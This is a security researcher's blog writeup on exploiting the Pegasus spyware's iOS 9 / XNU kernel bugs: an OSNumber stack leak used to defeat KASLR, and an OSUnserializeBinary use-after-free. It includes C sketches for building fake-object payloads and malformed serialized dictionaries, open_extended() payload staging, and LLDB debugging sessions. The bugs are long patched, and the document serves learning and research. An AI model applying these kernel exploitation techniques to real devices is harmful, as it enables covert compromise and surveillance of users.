Revisiting Pegasus on iOS9

Jul 2, 2022

What follows is a writeup of the kernel bugs NSO Group’s Pegasus spyware exploited in iOS 9, specifically versions 9.3.4 and earlier. The spyware was discovered and the vulnerabilities patched roughly six years ago.

Why now? Well, “now” isn’t exactly the right word; I wrote this up just over four years ago. At the time, my intent wasn’t to publish. Rather, it was to better understand the practical aspects of exploiting kernel bugs in XNU, iOS’s and macOS’s kernel. As I explain in the writeup, there’s often a lot of discussion of bugs themselves, and sometimes some superficial discussion of their exploitability. But there’s rarely a soup-to-nuts discussion along the lines of “What do these bugs actually get you? What does exploiting kernel bugs on iOS actually look like, and what do you do next, having exploited them?”. I wanted to understand those aspects of kernel exploitation, so I went through the exercise of exploiting the bugs myself, in as similar a manner as possible to what Pegasus did. I wanted to understand the challenges of:

The exploit development process
Exploiting the bugs reliably, and without destabilizing the target
Using the exploited kernel to practical effect

So I wrote up what I learned along the way.

I recently blew the dust off this writeup and spent some time with it. Even though a lot has changed in iOS & XNU in the years since, I still personally found it to be an interesting read. There’s a lot I had forgotten! More importantly I think there’s a lot of still-relevant theory here.

There’s also a lot of practical nitty gritty along the lines of “I dumped a bunch of kernel memory, but how do I find a pointer I should care about?”. Or “how do I coax information out of LLDB about these kernel structures?”.

I should say, inexperienced in this area as I was, I literally spent months of personal weekend & evening time on the project, plus weeks more on the writeup. I’m sure there’s stuff that’s incorrect, or stuff I thought was cool and novel that would be plainly obvious to others. I welcome (constructive!) feedback from anyone who is inclined to share.

I would also add that I made it close but not quite to the writeup’s stated goal. As such, things get increasingly loose and speculative toward the end. I apologize in advance! I did my best to clean up and clarify things where I could, while preserving the essence of my original experience. With that in mind, I would give the reader this bit of advice: read for as long as it’s interesting and things make sense, but no further. If and when stuff gets weird, don’t feel bad about getting off the train, having enjoyed the journey to that point.

Oh and one last thing. This is highly atypical for me, but I’m not publishing my exploit code for this. Not that I don’t want to or feel that I shouldn’t. The problem is it’s a mess. Cleaning it up for public consumption would take more time and effort than I have available. I do apologize, and I hope that doesn’t keep this from being useful.

Anyway, I hope you enjoy the read!

Cheers, Zach

Practical Exploitation of Pegasus Kernel Vulnerabilities

March 2018

Synopsis

This article is an exploration of the practical aspects of exploiting the kernel bugs used by the Pegasus iOS malware, which targeted iOS 9. It is less a discussion of the vulnerabilities themselves and is instead focused on concrete details of exploitation and post-exploitation.

Motivation

I wanted to learn more about the practical aspects of kernel exploitation and modern memory corruption techniques.

I also wanted to cultivate an understanding of kernel internals, particularly from an offensive perspective.

My goal was to develop a sufficiently complete exploit to facilitate post-exploitation activity. There is abundant discussion of kernel bugs and their effects, but their value to the attacker is usually left abstract. Many practical questions around exploitation are often left as exercises for the reader. For example, given primitives that allow you to arbitrarily read, write, and execute in the kernel, what would you do with those? Specifically, what memory would you read or write? Would you overwrite a data structure? If so, which one, and why? Would you call an arbitrary kernel function? To what effect?

Perhaps the most motivating factor, however, was frustration while reading Lookout’s technical Pegasus paper. While it is probably the most detailed and complete literature on the topic, much of it is confusingly organized and impenetrable. I worked through the exercise of exploiting the bugs myself in order to demystify what the paper was attempting to describe.

This writeup’s target audience is the version of myself that existed just prior to my first attempt to read through the Lookout paper.

Note: When researching these bugs and their exploitation, I targeted OS X 10.11.3 (15D21) in order to take advantage of the convenience of a virtual machine. Although iOS and arm64 impose constraints not present with OS X and x86-64, I worked within those constraints anyway, in order to better understand Pegasus’s actual exploitation process. As such, much of the discussion below, such as disassembly fragments and ROP gadgets, will be in the context of x86-64. But the concepts translate directly to kernel exploitation on iOS and arm64.

Prerequisite Reading

Analysis and Exploitation of Pegasus kernel vulnerabilities by jndok

tfp0 powered by Pegasus by Siguza

Technical Analysis of the Pegasus Exploits on iOS by Lookout

Overview of Pegasus Kernel Vulnerabilities

The Pegasus kernel vulnerabilities have been discussed and documented at length. Siguza’s cl0ver article presents an excellent technical description. As a refresher, however, here’s a brief description:

OSNumber Information Leak

It’s possible to:

Craft a serialized dictionary with a malformed OSNumber
Create a user client object in the kernel, and set properties on it with the specially crafted dictionary
Read the properties back out in order to leak kernel data from kernel memory

The OSNumber class in XNU’s IOKit allowed an arbitrary number of bits to be specified for its size. So instead of an OSNumber that’s 32 or 64 bits, one can be specially crafted to be, say, 4096 bits. When the OSNumber property gets serialized back to userspace, its value gets placed on the stack, and then a number of bytes equal to its claimed size (number of bits / 8) gets copied into the serialized buffer. As a result, an arbitrary amount (512 bytes in the case of a “4096” bit number) of kernel memory from the current thread’s stack can be copied to userspace.

OSUnserializeBinary Use-after-Free

In the function OSUnserializeBinary(), serialized data from userspace is unpacked into an object graph composed of several IOKit property data types or their container types. These types are congruent to plist data types:

dictionary
array
number (real and integer)
string
data
boolean
date

In addition there’s a special “object reference” which allows an object elsewhere in the graph to be referenced from one or more other locations.

The topmost object in the graph is typically a dictionary. When unserializing a dictionary, the function expects OSSymbols for dictionary keys but will tolerate OSStrings. In the case of an OSString (named o in this function), it coerces the string into the desired OSSymbol, then releases the original string object, o. And here’s the bug: though it released o, OSUnserializeBinary() maintains an off-the-books reference to it. Later during unserialization, if another serialized object is a back-reference to the string, the dangling reference is used once more.

In the meantime, the memory for o has been freed and possibly reallocated. It may now contain attacker-controlled data. As a result, the attacker gets to decide what happens when o->retain() gets called on the freed object. The technical aspects of this bug are expanded further in the sections Payload Anatomy, How OSString Works, and Use-After-Free Dictionary and Payload Construction.

Interfacing with IOKit and Triggering the Bugs

A non-trivial part of the exploit’s userspace component involves boilerplate code to interact with IOKit kernel interfaces. Those details will not be discussed in this writeup. The reader is advised to read jndok’s and Siguza’s writeups and git repos, as well as the Lookout paper for detailed examples.

Kernel Exploitation Goal

The goal of Pegasus’s kernel exploit is to patch the kernel in such a way that post-exploit userspace code may stably read and write arbitrary kernel memory, as well as call arbitrary kernel functions with some number of userspace controlled arguments (or more generally execute arbitrary kernel code). More to the point, once the kernel is patched, it will no longer be necessary to exploit vulnerabilities that risk destabilizing the system. The patch sets up a generic read-write-execute framework that does not require further exploitation. This is discussed at length in the Post-Exploitation: Gaining Reusable Read, Write, and Execute section.

Exploitation Sequence

The exploitation sequence is approximately as follows:

Leak Kernel ASLR slide via OSNumber
Create payload staging thread for 2nd stage payload
Leak an oracle from kernel memory that predicts location of stage 2 payload
Craft 2nd stage payload with memory references to itself, obtained from oracle
Pre-stage payload 2, blocking indefinitely on open_extended()
Craft 1st stage payload, with pointers to the 2nd stage payload, obtained from oracle
Use a specially crafted, malicious dictionary containing the 1st stage payload to trigger the use-after-free
Gadget chain in 2nd stage payload patches a key kernel structure
Thread terminates gracefully without panicking kernel
Patched kernel now exposes custom interface to allow arbitrary read, write, and execute from unprivileged userspace

Serialized Data Format

IOKit’s in-kernel unserializer, OSUnserializeXML(), handles two serialized data formats: an XML format closely related to plist XML (as indicated by the function name), and a binary format. In the case of binary serialized data (indicated by a magic number at the start), OSUnserializeXML() calls OSUnserializeBinary(), which is where the use-after-free occurs.

CoreFoundation types (such as CFArrayRef, CFDictionaryRef, CFStringRef, etc.) can be serialized in userspace using IOKit’s IOCFSerialize(). The researcher may find it useful to generate different constructs (arrays and dictionaries, containing other arrays, dictionaries, strings, and object references), and then serialize those to both XML and binary. When attempting to understand this format, it’s helpful to compare the two (using a hex editor to view the binary version) to study how serialized structures in the binary format equate to their XML counterparts.

Understanding the binary format is essential because system-provided frameworks are insufficient for generating the data structures used in exploitation. System frameworks will only produce valid serialized structures. For exploitation, the researcher needs greater control in order to generate the invalid structures that will trigger the vulnerabilities.

This article won’t comprehensively describe the serialized data format; it has been more than adequately described by jndok and Siguza. Instead, what follows are a few relevant high points.

OSUnserializeBinary() expects a buffer that starts with the appropriate magic number, followed by a series of 32-bit metadata fields. Each metadata item identifies what kind of object it describes, that object’s length, and whether this is the final object in the current collection. A metadata item is followed by the actual data it describes. For container types, this data would be additional metadata/data pairs. For non-container types, such as strings, integers, and booleans, the data would be the actual bytes for that object, zero-padded out to a 4-byte boundary.

Take as an example a metadata item for an OSDictionary containing two entries. The dictionary is the last item in its collection:

uint32_t metadata = kOSSerializeDictionary | 0x2 | kOSSerializeEndCollection;

The next four bytes would be the metadata for the first dictionary key, which would be followed by the literal bytes for that key, and so on.

It should be noted that for a given object what is meant by length depends on the type of object. For arrays, length is the number of items in the array. In contrast for an OSNumber, length is the number of bits required to represent the number, such as 32 or 64.
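As a rough sketch of how one of these 32-bit metadata words could be packed and unpacked: the SER_ names below are hypothetical stand-ins for the kOSSerialize* constants, and their values are reproduced from memory of XNU's OSSerializeBinary.h, so treat them as assumptions and check them against the source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed values; hypothetical SER_ names mirror the kOSSerialize* constants. */
#define SER_DICTIONARY     0x01000000u
#define SER_NUMBER         0x04000000u
#define SER_STRING         0x09000000u
#define SER_TYPE_MASK      0x7F000000u
#define SER_LEN_MASK       0x00FFFFFFu
#define SER_END_COLLECTION 0x80000000u

/* Combine an object type, its length field, and the end-of-collection flag. */
uint32_t ser_pack(uint32_t type, uint32_t len, int is_last)
{
    assert((type & ~SER_TYPE_MASK) == 0);
    assert((len & ~SER_LEN_MASK) == 0);
    return type | len | (is_last ? SER_END_COLLECTION : 0u);
}

uint32_t ser_type(uint32_t word)    { return word & SER_TYPE_MASK; }
uint32_t ser_len(uint32_t word)     { return word & SER_LEN_MASK; }
int      ser_is_last(uint32_t word) { return (word & SER_END_COLLECTION) != 0; }

/* Non-container payload bytes are zero-padded out to a 4-byte boundary. */
size_t ser_padded_len(size_t nbytes)
{
    return (nbytes + 3u) & ~(size_t)3u;
}
```

Under these assumptions, ser_pack(SER_DICTIONARY, 2, 1) yields the metadata word for the two-entry dictionary described above. What the length field means (item count, byte count, or bit count) still depends on the object type.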

For a better understanding of IOKit serialization, it is recommended the reader study jndok’s and Siguza’s writing on the subject while experimenting with example code using CoreFoundation container types.

Leak KASLR Slide

The kernel’s address in memory is randomized at each boot by an 8-bit slide and must be determined by the exploit code at run time. This allows the code to determine kernel offsets of gadgets used in the payload, as well as the location of critical data structures that must be leaked or patched.

Fortunately for the attacker, the OSNumber information leak is a powerful primitive, making it possible to leak an arbitrary amount of the current function’s call stack. It is easy to locate the return address of the calling kernel function, and compare that to what the return address would be with an unslid kernel. The difference between the two is the kernel slide.
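The arithmetic is simple enough to sketch. The function names here are hypothetical, and the unslid return address is assumed to have been read out of the on-disk kernel image beforehand.

```c
#include <assert.h>
#include <stdint.h>

/* Slide = leaked (slid) return address minus the same return address as it
 * appears in the unslid kernel image. */
uint64_t kaslr_slide(uint64_t leaked_ret, uint64_t unslid_ret)
{
    assert(leaked_ret >= unslid_ret);
    return leaked_ret - unslid_ret;
}

/* Apply the slide to any other unslid address (a gadget, a data structure). */
uint64_t slide_addr(uint64_t unslid, uint64_t slide)
{
    return unslid + slide;
}
```

Once the slide is known, every gadget offset and structure address taken from the static kernel image can be passed through slide_addr() before it goes into a payload.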

Payload Anatomy

Pegasus’s payload consists of two parts. The first, smaller payload is contained in the malicious, serialized dictionary that is unserialized by OSUnserializeBinary(). The second, larger payload gets staged ahead of time using a non-POSIX variant of the open() system call, called open_extended().

Due to the way kernel memory allocation zones work, the first payload is limited in size to 32 bytes. If it’s larger, it will be allocated in a different zone than the OSString object that is freed, so the use-after-free never occurs.

An example of a broken dictionary to exploit the use-after-free might look something like:

    <dict>
        <string id="0">"AAA"</string>
        <data>[   0-7  |  8-15  | 16-23 | 24-31  ]</data>
        <string IDREF="0" />
    </dict>

The XML representation above is for ease of illustration; the actual payload would be in the binary format. As you can see, the dictionary contains a 32-byte data object that serves as the initial payload.

This dictionary is clearly broken in a few ways. The first string object ("AAA") serves as a dictionary key, and the subsequent data object is that key’s corresponding value. After this first key/value pair comes a second key. This key is an object reference to the first key, which violates the contract of a dictionary: no duplicate keys. Additionally, this second key has no corresponding value. None of this matters, though, as the use-after-free occurs before OSUnserializeBinary() has a chance to reject the malformed data.

In order to understand the composition of the first payload, it’s worth revisiting the use-after-free vulnerability briefly.

As a refresher, the unserializer prefers every dictionary key to be an actual <key> object, which becomes an OSSymbol in the kernel. It will, however, permit string objects to be used as dictionary keys instead. In this case, an OSSymbol object is constructed from an OSString, and the string object is freed before unserialization continues.

Later, when an object reference (the IDREF="0" in the above XML) is encountered, no new object is created. Instead, the object being referenced is located and its reference count increased:

case kOSSerializeObject:
    if (len >= objsIdx) break;
    o = objsArray[len];
    o->retain();
    isRef = true;
    break;

The o retrieved from the objects array has been freed and hopefully replaced by the 32 bytes of data from our <data> object. When o is dereferenced it will be interpreted as an OSString object. When the address of the virtual retain() function is looked up, the 32-byte payload must point to a buffer that can be interpreted as a virtual function table.

How OSString Works

In order to understand how to construct the first stage payload, it helps to understand the OSString class a bit.

If an OSString instance were represented as a C struct, it might look a little like:

struct OSString
{
	void      ** vtab;          //8 bytes
	int          retainCount;   //4 bytes
	unsigned int flags;         //4 bytes
	unsigned int length;        //4 bytes + 4-byte pad for alignment
	const char * string;        //8 bytes
};

When o->retain() is called, the retain function is looked up in the OSString object’s virtual function table. This disassembles to:

mov     rax, [rbx]            ; dereference 'o', obtaining its vtable pointer
mov     rdi, rbx              ; move object pointer into rdi: 'this' pointer for retain()
call    qword ptr [rax+20h]   ; call [vtable+0x20], theoretically a pointer to retain()

Our attacker-controlled 32-byte “OSString” doppelganger can’t point directly to executable code of our choosing. Instead, it needs to point to an attacker-controlled buffer which, in turn, will point to arbitrary executable code.

In theory, the first stage payload could point back into itself. However, there’s no way to leak the address of this buffer prior to triggering the use-after-free. Plus, 32 bytes isn’t much to work with, and the first eight of those are spoken for. Instead, we can point it to a second attacker-controlled buffer which will masquerade as a virtual function table, pointing to whatever code we would like to execute in place of retain().
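To make the two-buffer relationship concrete, here is a minimal layout sketch. The struct and function names are hypothetical. The 0x20 slot offset comes from the disassembly above, and the 32-byte layout assumes the illustrative struct shown earlier rather than a verified dump of the real class.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RETAIN_VTABLE_OFFSET 0x20u  /* from the disassembly: call [rax+20h] */

/* Hypothetical mirror of the 32-byte OSString layout sketched above. */
struct fake_osstring {
    uint64_t vtab;          /* will hold the address of the second buffer */
    uint32_t retain_count;
    uint32_t flags;
    uint32_t length;
    uint32_t pad;
    uint64_t string;
};

/* Fill the 32-byte first stage so that its vtable pointer is stage2_addr. */
void build_stage1(uint8_t out[32], uint64_t stage2_addr)
{
    struct fake_osstring s;

    assert(sizeof(s) == 32);
    memset(&s, 0, sizeof(s));
    s.vtab = stage2_addr;
    memcpy(out, &s, sizeof(s));
}

/* Write the address to be called into the slot retain() would occupy. */
void set_retain_slot(uint8_t *stage2, size_t stage2_len, uint64_t target)
{
    assert(stage2_len >= RETAIN_VTABLE_OFFSET + sizeof(target));
    memcpy(stage2 + RETAIN_VTABLE_OFFSET, &target, sizeof(target));
}
```

The only field of the fake object that matters for the initial control transfer is the first one. The remaining 24 bytes are left zeroed here, though a real chain may need specific values in them.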

Staging Payload Part 2

As discussed above, the 32-byte payload in the malformed dictionary mimics an OSString object and must point to a second stage buffer which mimics a vtable. We need to control the contents of that second buffer and also know its address in advance.

In addition to mimicking a vtable, the stage 2 payload must represent a chain of gadgets and arguments to those gadgets. Each gadget’s jump or return address must be populated from this buffer.

This larger payload must be staged in advance so that the fake OSString can reference it.

How open_extended() works

A non-POSIX variant of the open() syscall, open_extended(), can be abused to stage an attacker-controlled buffer in memory.

The open_extended() system call allows the caller to provide a filesystem ACL structure containing an arbitrary number (zero or more) of ACL entries. Rather than copy in a minimum amount of data from userspace to parse the start of the applicable structures and calculate the number of ACLs to copy in, it copies in more than it needs on the first try. The thinking is that the caller likely provided a small number of (or zero) ACLs, and if there are more, it can circle back and copy the rest.

open_extended() copies in the remainder of the page containing the ACL structures. By ensuring the ACL structures and the payload data are created in a page-aligned buffer, the attacker can maximize the amount of data copied from userspace to kernel memory.

The following comment in kauth_copyinfilesec() explains this behavior succinctly:

//File: xnu-3248.30.4/bsd/kern/kern_authorization.c

/*
 * Make a guess at the size of the filesec.  We start with the base
 * pointer, and look at how much room is left on the page, clipped
 * to a sensible upper bound.  If it turns out this isn't enough,
 * we'll size based on the actual ACL contents and come back again.
 *
 * The upper bound must be less than KAUTH_ACL_MAX_ENTRIES.  The
 * value here is fairly arbitrary.  It's ok to have a zero count.
 */

There isn’t a userspace stub or function declaration for open_extended(). It must be called using syscall() and the syscall number, SYS_open_extended. If there were a function declaration, however, it would look like this:

int
open_extended(char *path, int flags, uid_t owner, gid_t group, mode_t mode, struct kauth_filesec *fsacl);

The optional kauth_filesec struct is composed like so:

// xnu-3248.30.4/bsd/sys/kauth.h
/* File Security information */
struct kauth_filesec {
   u_int32_t   fsec_magic;
#define KAUTH_FILESEC_MAGIC    0x012cc16d
   guid_t      fsec_owner;
   guid_t      fsec_group;

   struct kauth_acl fsec_acl;
};

That structure contains a kauth_acl struct:

//File: xnu-3248.30.4/bsd/sys/kauth.h
/* Access Control List */
struct kauth_acl {
   u_int32_t   acl_entrycount;
   u_int32_t   acl_flags;

   struct kauth_ace acl_ace[1];
};

Knowledge of the kauth_ace struct’s composition is unnecessary, as we will set fsec_acl.acl_entrycount to KAUTH_FILESEC_NOACL. We aren’t providing any ACL entries. In place of the ACLs, we’ll include the stage 2 payload.

Although it isn’t strictly necessary, we can apply the same calculations as the kernel to work out the maximum amount of ACL data copied in, in the optimal case of a page-aligned buffer: 812 bytes.

#define mach_vm_round_page(x) (((mach_vm_offset_t)(x) + vm_page_mask) & ~((signed)vm_page_mask))
#define KAUTH_FILESEC_SIZE(c)       (__offsetof(struct kauth_filesec, fsec_acl) + \
									__offsetof(struct kauth_acl, acl_ace) + \
										(c) * sizeof(struct kauth_ace))

size_t calc_kauth_copyin_size(user_addr_t xsecurity)
{
	user_addr_t uaddr;
	user_addr_t known_bound;
	uint32_t count;
	size_t copysize;
	printf("size of struct kauth_filesec: %lu\n",sizeof(struct kauth_filesec));
	known_bound = xsecurity + KAUTH_FILESEC_SIZE(0);
	printf("known_bound: %016llx\n",known_bound);
	uaddr=mach_vm_round_page(known_bound);
	printf("uaddr: 0x%016llx\n",uaddr);
	count = (uaddr - known_bound) / sizeof(struct kauth_ace);
	printf("count:%u\n",count);
	if (count > 32)
		count = 32;
	printf("offset of fsec_acl: %lu\n",__offsetof(struct kauth_filesec, fsec_acl));
	printf("offset of acl_ace: %lu\n",__offsetof(struct kauth_acl, acl_ace));
	printf("size of struct kauth_ace: %lu\n",sizeof(struct kauth_ace));
	copysize = KAUTH_FILESEC_SIZE(count);

	return copysize;
}

Note: In order to allocate a page-aligned buffer on the stack, Pegasus goes through nontrivial contortions, which the Lookout paper doesn’t explain particularly well. It’s unclear why, however, since there are easier ways to get such an aligned buffer, such as using mach_vm_allocate().
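As an illustration of one of those easier ways, the sketch below uses posix_memalign() as a portable stand-in for mach_vm_allocate() and writes a minimal filesec header at the start of the page. The function and macro names are hypothetical. The offsets (36 and 44) are derived from the struct definitions above assuming no unexpected padding, and the value used for KAUTH_FILESEC_NOACL is an assumption to verify against kauth.h.

```c
#define _POSIX_C_SOURCE 200112L
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define FILESEC_MAGIC      0x012cc16du  /* KAUTH_FILESEC_MAGIC, from the header above */
#define FILESEC_NOACL      0xffffffffu  /* assumed value of KAUTH_FILESEC_NOACL */
#define FILESEC_ACL_OFFSET 36u          /* 4 (magic) + 16 (owner) + 16 (group) */
#define FILESEC_HDR_LEN    44u          /* ... + 4 (entrycount) + 4 (flags) */

/* Allocate one zeroed, page-aligned page and write a filesec header at its
 * start. Payload bytes would begin at offset FILESEC_HDR_LEN. Returns NULL
 * on failure; the caller frees the buffer with free(). */
uint8_t *alloc_filesec_page(size_t *page_size_out)
{
    long page = sysconf(_SC_PAGESIZE);
    void *buf = NULL;
    uint32_t magic = FILESEC_MAGIC;
    uint32_t count = FILESEC_NOACL;

    if (page <= 0 || posix_memalign(&buf, (size_t)page, (size_t)page) != 0)
        return NULL;

    memset(buf, 0, (size_t)page);
    memcpy((uint8_t *)buf, &magic, sizeof(magic));                      /* fsec_magic */
    memcpy((uint8_t *)buf + FILESEC_ACL_OFFSET, &count, sizeof(count)); /* acl_entrycount */

    if (page_size_out != NULL)
        *page_size_out = (size_t)page;
    return buf;
}
```

Because the buffer starts on a page boundary, the kernel's "room left on the page" guess is as large as it can be, so the clipped 32-entry maximum applies.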

Making the Payload Hang Around

Using open_extended() to stage an attacker-controlled buffer presents a small problem.

Let’s look at an abbreviated form of the function:

    int
    open_extended()
    {
      ...

        kauth_copyinfilesec(uap->xsecurity, &xsecdst);

      ...

        ciferror = open1(vfs_context_current(), &nd, uap->flags, &va,
                fileproc_alloc_init, NULL, retval);

        if (xsecdst != NULL)
            kauth_filesec_free(xsecdst);

        return ciferror;
    }

As can be seen above, the kauth_filesec_t structure containing the attacker-controlled payload gets freed just before the return. Working around this is straightforward, however. In a separate thread, we simply need to lock the file that open_extended() will open.

fd=open(path,O_CREAT|O_RDWR|O_EXLOCK,0600);

This advisory lock will cause open_extended() to block in open1() assuming it is passed the lock flag as well:

fd=open_extended(path,O_RDWR|O_EXLOCK,owner,group,mode,(struct kauth_filesec *)payload);
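The blocking behavior can be observed in isolation. The sketch below is not the exploit code: it uses flock(), whose semantics O_EXLOCK follows on BSD-derived systems, and a non-blocking second attempt so the demonstration returns instead of hanging. The function name and temporary path are hypothetical.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/file.h>
#include <unistd.h>

/* Returns 1 if a second exclusive lock attempt would block while the first
 * descriptor holds the lock, 0 if it unexpectedly succeeds, -1 on error. */
int second_locker_would_block(void)
{
    char path[] = "/tmp/lockdemo.XXXXXX";
    int holder, waiter, result = -1;

    holder = mkstemp(path);            /* plays the role of the locking thread */
    if (holder < 0)
        return -1;

    waiter = open(path, O_RDWR);       /* plays the role of open_extended() */
    if (waiter >= 0 && flock(holder, LOCK_EX) == 0) {
        if (flock(waiter, LOCK_EX | LOCK_NB) == 0)
            result = 0;
        else if (errno == EWOULDBLOCK)
            result = 1;
    }

    if (waiter >= 0)
        close(waiter);
    close(holder);
    unlink(path);
    return result;
}
```

Without LOCK_NB, the second caller would simply sleep until the holder releases the lock, which is the state the staging thread is meant to stay in.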

How the Oracle Works

We need not only to control the contents of a second, larger buffer, but also to know the address of that buffer in advance. The bespoke, serialized dictionary that will trigger the use-after-free must point to the second stage payload as if that buffer were OSString’s vtable.

Two things we know to be true:

OSNumber dumps an arbitrary amount of data from the current thread’s stack.
The second payload is staged in a separate thread, because that thread must block forever.

From this it becomes clear the OSNumber leak must:

Leak the address of the second payload from the same thread in which that payload is staged
Leak the address prior to the second stage payload getting staged and prior to that kernel buffer getting allocated

How does the info leak predict the address of the second stage buffer? It turns out that the process of triggering the leak allocates a buffer whose address will be placed on the stack. This buffer will be immediately freed and reallocated in open_extended().

In LLDB, we can investigate what pointer is leaked, what’s special about it, and why it comes from the same allocation zone as the kauth_filesec allocation containing the payload.

Here’s an XML representation of the serialized dictionary used to trigger the leak.

<dict>
	<key>
		"ararararararararararararararararararararara"
		"ararararararararararararararararararararara"
		"ararararararararararararararararararararar"
	</key>
	<number size=0x200>
		0x4141414141414141
	</number>
</dict>

Above, the property name is a suspiciously long string used by Pegasus. Does this influence the heap in some way? Additionally, we have the value set to the Hacking Number of 0x4141414141414141. And the size, 0x200, or 512, is the number of bits we’re specifying for the OSNumber. When the number is serialized, the object’s numberOfBytes() method is called, which converts bits to bytes:

//File: xnu-3248.30.4/iokit/Kernel/IOUserClient.cpp
offsetBytes = off->unsigned64BitValue();
len = off->numberOfBytes();

//File: xnu-3248.30.4/libkern/c++/OSNumber.cpp
unsigned int OSNumber::numberOfBytes() const { return (size + 7) / 8; }
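For reference, a binary encoding of a dictionary like this one could be assembled roughly as follows. This is a sketch, not Pegasus's code: the SER_ names are hypothetical, their values (including the signature word) are recalled from XNU's OSSerializeBinary.h and should be verified, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SER_SIGNATURE      0x000000d3u  /* assumed: kOSSerializeBinarySignature */
#define SER_DICTIONARY     0x01000000u
#define SER_NUMBER         0x04000000u
#define SER_SYMBOL         0x08000000u
#define SER_LEN_MASK       0x00FFFFFFu
#define SER_END_COLLECTION 0x80000000u

/* Append one 32-bit word at byte offset off; returns the new offset. */
static size_t put_word(uint8_t *buf, size_t off, uint32_t w)
{
    memcpy(buf + off, &w, sizeof(w));
    return off + sizeof(w);
}

/* Encode { key : OSNumber(value, bits) } into buf. Returns the number of
 * bytes written, or 0 if the arguments do not fit. */
size_t build_leak_dict(uint8_t *buf, size_t cap, const char *key,
                       uint32_t bits, uint64_t value)
{
    size_t key_len = strlen(key) + 1;               /* symbol length counts the NUL */
    size_t padded  = (key_len + 3u) & ~(size_t)3u;  /* pad to a 4-byte boundary */
    size_t need    = 4 + 4 + 4 + padded + 4 + 8;
    size_t off     = 0;

    if (cap < need || key_len > SER_LEN_MASK || bits > SER_LEN_MASK)
        return 0;

    memset(buf, 0, need);
    off = put_word(buf, off, SER_SIGNATURE);
    off = put_word(buf, off, SER_DICTIONARY | 1u | SER_END_COLLECTION);
    off = put_word(buf, off, SER_SYMBOL | (uint32_t)key_len);
    memcpy(buf + off, key, key_len);
    off += padded;
    off = put_word(buf, off, SER_NUMBER | bits | SER_END_COLLECTION);
    memcpy(buf + off, &value, sizeof(value));       /* always 8 bytes of value */
    off += sizeof(value);

    assert(off == need);
    return off;
}
```

The point to notice is that the bit count lives in the metadata word while only eight bytes of value follow it, so nothing in the format itself ties the claimed size to the data actually supplied.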

Here’s sample output from the info leak:

[@] String data length: 128
[@] Padded length for string data: 128
[@] String data length: 8
[@] Padded length for string data: 8
[@] leaksize: 512
[@] 00: 0x4141414141414141
[@] 08: 0xffffff801441de78
[@] 16: 0xffffff8017d16400 <--Info leak oracle

By setting a breakpoint in is_io_registry_entry_get_property_bytes() we can have a look at the stack and see what our leaked pointer correlates to:

(lldb) breakpoint set -f IOUserClient.cpp -l 2669
Breakpoint 1: where = kernel.development`::is_io_registry_entry_get_property_bytes(io_object_t, char *, char *, mach_msg_type_number_t *) + 125 at IOUserClient.cpp:2669, address = 0xffffff800e4b77ad

Then run the exploit code (or even better, just a leak PoC that doesn’t crash).

(lldb) c
error: Process is running.  Use 'process interrupt' to pause execution.
Process 1 stopped
* thread #25, name = '0xffffff8018624950', queue = 'cpu-0', stop reason = breakpoint 3.1
frame #0: 0xffffff800e4b77ad kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=0xffffff8017d16400, property_name="ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara", buf="", dataCnt=0xffffff80143525cc) at IOUserClient.cpp:2669 [opt]

Various inlined functions confuse the debugger, so single-stepping doesn’t work well. We can, however, set a new breakpoint just before the oversized OSNumber object gets copied from the stack:

(lldb) breakpoint set -f IOUserClient.cpp -l 2704
Breakpoint 4: where = kernel.development`::is_io_registry_entry_get_property_bytes(io_object_t, char *, char *, mach_msg_type_number_t *) + 541 at IOUserClient.cpp:2704, address = 0xffffff800e4b794d
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #25, name = '0xffffff8018624950', queue = 'cpu-0', stop reason = breakpoint 4.1
    frame #0: 0xffffff800e4b794d kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=<unavailable>, property_name=<unavailable>, buf="", dataCnt=0xffffff80143525cc) at IOUserClient.cpp:2704 [opt]
2701            ret = kIOReturnIPCError;
2702        else {
2703                *dataCnt = len;
-> 2704             bcopy( bytes, buf, len );
2705        }
2706        }
2707        obj->release();
Target 0: (kernel.development) stopped.

Now, just before the copy happens, let’s inspect the stack:

0xFFFFFF8012C2BDC0: 00 64 D1 17 80 FF FF FF | .d...... | 0xFFFFFF8017D16400 => 0xFFFFFF7F8F211F30 => 0xFFFFFF7F8F2089A2 => "UH"
0xFFFFFF8012C2BDB8: 78 BA 2F 14 80 FF FF FF | x./..... | 0xFFFFFF80142FBA78 => ""
0xFFFFFF8012C2BDB0: 41 41 41 41 41 41 41 41 | AAAAAAAA |
[stack]

The first value on the stack is the 0x4141414141414141 of our OSNumber. Skipping the second, the third value on the stack is our oracle: 0xFFFFFF8017D16400.

Looking back at the function arguments LLDB showed, we see this is the registry_entry argument:

kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=0xffffff8017d16400,

The kernel dSYM provides a set of LLDB macros for inspecting ioregistry data:

(lldb) command script import "kernel.development.dSYM/Contents/Resources/Python/lldbmacros/ioreg.py"

The showobject macro should help, but it raises an exception. Let’s inspect the object another way: by looking at its vtable to determine what class it’s part of. The vtable is the first pointer in the class structure:

(lldb) p (*(void **)registry_entry)
(void *) $245 = 0xffffff7f8f211f30

Based on the address (0xffffff7...), that vtable appears to be part of a kernel extension. What kernel extension?

(lldb) showkextaddr 0xffffff7f8f211f30
kmod_info            address              size                  id  refs              version name
0xffffff7f8f214940   0xffffff7f8f203000   0x19000               17     0                417.2 com.apple.driver.DiskImages    offset =  0xef30

It appears to be com.apple.driver.DiskImages. If we have symbols, we can load them into LLDB:

(lldb) addkext -N com.apple.driver.DiskImages
Fetching dSYM for 97177a33-27bd-34a9-9b42-1173be480bcd
Adding dSYM (97177a33-27bd-34a9-9b42-1173be480bcd) for /Library/Caches/com.apple.bni.symbols/uuidsymmap.apple.com/dsyms/SUGalaDanceHW/DiskImages_kexts/DiskImages_kexts-417.2~92/97177A33-27BD-34A9-9B42-1173BE480BCD/IOHDIXController

If it’s a kext for which you don’t have symbols, a disassembler such as IDA Pro can help resolve what class this vtable belongs to.

